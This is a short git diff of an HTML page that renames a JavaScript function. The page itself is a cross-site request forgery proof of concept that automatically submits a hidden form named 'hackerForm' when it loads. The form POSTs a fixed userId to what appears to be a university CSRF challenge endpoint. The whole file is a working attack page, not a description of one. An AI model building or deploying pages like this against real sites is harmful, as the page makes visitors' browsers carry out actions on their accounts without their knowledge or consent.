--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
 <head>
 <title>Hello there</title>
 </head>
-<body onload="formy()">
+<body onload="submitForm()">
   <img src="http://klockren.se/klockren.png" style="width: 500px;" />
   <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengeone/plusplus" method="POST">
     <input type="hidden" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
@@ -13,7 +13,7 @@
     <input type="submit"/>
   </form>
 <script> 
-function formy(){
+function submitForm(){
   document.hackerForm.submit(); 
  }
 </script> 
